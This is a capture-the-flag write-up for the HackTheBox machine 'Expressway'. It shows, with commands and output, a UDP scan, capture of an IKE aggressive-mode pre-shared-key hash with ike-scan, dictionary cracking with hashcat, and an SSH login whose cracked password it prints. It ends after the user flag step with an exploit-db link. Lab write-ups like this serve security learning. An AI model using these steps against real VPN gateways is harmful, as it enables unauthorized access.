HackTheBox: Expressway
SPOILER WARNING: This page will contain potential spoilers, so consider that before continuing Expressway introduces the challenge of exploiting a weakly configured VPN, and cracking credentials. It's a fun challenge with not a lot of steps, but fun concepts, that could be solved in just an afternoon from a shell. MACHINE INFO ┌────────────────────────────┐ │ MACHINE NAME: Expressway │ │ IP: N/A │ │ DIFFICULTY: Easy │ └────────────────────────────┘ The first thing to do is to map out what exactly the machine is running, how we can connect to it, and what's likely to have some vulnerability. At first, I ran into the issue of Nmap not showing anything other than OpenSSH, which was odd because that usually isn't a target for HTB. Rather than looking for vulnerabilities in SSH, I played with my Nmap flags until I found that -sU (UDP Scan) showed me what I was looking for.$ sudo nmap -sC -sV -sU expressway.htb Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-17 22:36 -0800 Nmap scan report for expressway.htb (10.129.2.172) Host is up (0.085s latency). PORT STATE SERVICE VERSION 500/udp open isakmp? | ike-version: | attributes: | XAUTH |_ Dead Peer Detection v1.0 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 121.02 seconds What we see here is an Internet Key Exchange (IKE) server using Dead Peer Detection (DPD) which is one way for IKE servers to advertise their presence [1]. And, we'll need a tool to interface with it, one such option is ike-scan which I found particularly useful in this case [2].$ sudo ike-scan expressway.htb Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/) 10.129.2.172 Main Mode Handshake returned HDR=(CKY-R=87048450f8217b08) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Ending ike-scan 1.9.6: 1 hosts scanned in 0.096 seconds (10.36 hosts/sec). 1 returned handshake; 0 returned notify We can see it's using weak encryption so we might as well try and get a hash to crack.$ sudo ike-scan expressway.htb --aggressive -Pexpresswayhash Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/) 10.129.2.172 Aggressive Mode Handshake returned HDR=(CKY-R=d89a8b14b28af22c) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes) Ending ike-scan 1.9.6: 1 hosts scanned in 0.099 seconds (10.15 hosts/sec). 1 returned handshake; 0 returned notify $ cat expresswayhash 6018ae18889f1debeee9dd5e3d24fe835d9ac267ee7a470dd67790984e4891a55b81db1668... Now we have a user, ike@expressway.htb, and a hash for the password. This may be a regular user or a service, but we can go ahead and try to crack it.$ hashcat -a 0 expresswayhash ~/Downloads/rockyou.txt Dictionary cache built: * Filename..: /home/amelia/Downloads/rockyou.txt * Passwords.: 14344392 * Bytes.....: 139921507 * Keyspace..: 14344385 * Runtime...: 0 secs 6018ae18889f1debeee9dd5e3d24fe835d9ac267ee7a470d...:freakingrockstarontheroad And, with these credentials, we have a shell.ike@expressway.htb's password: Last login: Wed Sep 17 12:19:40 BST 2025 from 10.10.14.64 on ssh Linux expressway.htb 6.16.7+deb14-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.16.7-1 (2025-09-11) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sun Jan 18 07:13:29 2026 from 10.10.15.66 ike@expressway:~$ cat user.txt https://www.exploit-db.com/exploits/52352 References 1. https://community.cisco.com/t5/security-knowledge-base/dead-peer-detection/ta-p/3111324 2. https://www.kali.org/tools/ike-scan/